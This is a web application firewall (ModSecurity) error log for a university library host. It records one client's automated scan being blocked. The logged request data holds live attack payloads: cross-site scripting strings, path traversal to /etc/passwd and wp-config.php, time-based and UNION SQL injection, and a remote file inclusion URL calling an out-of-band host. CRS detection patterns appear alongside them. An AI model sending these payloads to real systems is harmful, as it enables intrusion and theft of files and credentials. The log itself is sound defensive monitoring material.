[Tue Aug 29 11:48:12.717705 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgoAAAAH"]
[Tue Aug 29 11:48:17.787776 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAdxU0wAAAAC"]
[Tue Aug 29 11:48:18.438083 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAjbw@8AAAAW"]
[Tue Aug 29 11:48:21.419818 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjYrEAAAAAK"]
[Tue Aug 29 11:48:21.663177 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz7AAAAAC"]
[Tue Aug 29 11:48:21.702281 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAkrz7IAAAAC"]
[Tue Aug 29 11:48:22.371349 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjYrE4AAAAK"]
[Tue Aug 29 11:48:23.498293 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EcAAAAa"]
[Tue Aug 29 11:48:23.826930 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzwrphifx1ehwg.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gzwrphifx1ehwg.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FAAAAAa"]
[Tue Aug 29 11:48:27.864733 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk7QJIAAAAi"]
[Tue Aug 29 11:48:31.744718 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkqHsEAAAAM"]
[Tue Aug 29 11:48:32.352112 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlFH44AAAAk"]
[Tue Aug 29 11:48:33.436976 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAktzFkAAAAP"]
[Tue Aug 29 11:48:35.347543 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAkAMIoAAAAU"]
[Tue Aug 29 11:48:35.353150 2023] [:error] [pid 2364] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAk8yrAAAAAj"]
[Tue Aug 29 11:48:36.492754 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAklezUAAAAD"]
[Tue Aug 29 11:48:37.424884 2023] [:error] [pid 2360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAk4IkoAAAAf"]
[Tue Aug 29 11:48:38.403838 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkAMJUAAAAU"]
[Tue Aug 29 11:48:40.439139 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlL7B8AAAAq"]
[Tue Aug 29 11:48:43.405367 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlQ3rcAAAAw"]
[Tue Aug 29 11:48:43.406459 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAluT1UAAAAe"]
[Tue Aug 29 11:48:47.472292 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAltVY0AAAAR"]
[Tue Aug 29 11:48:49.374163 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAltVY8AAAAR"]
[Tue Aug 29 11:48:49.423500 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAmHd4YAAAAz"]
[Tue Aug 29 11:48:49.446560 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkwQS8AAAAS"]
[Tue Aug 29 11:48:50.368478 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAmHd4gAAAAz"]
[Tue Aug 29 11:48:51.398257 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAk7QLMAAAAi"]
[Tue Aug 29 11:48:52.428029 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAjtdCMAAAAX"]
[Tue Aug 29 11:48:53.373079 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAlV8CYAAAA1"]
[Tue Aug 29 11:48:54.395772 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAkyx-0AAAAW"]
[Tue Aug 29 11:48:55.404114 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkskt4AAAAN"]
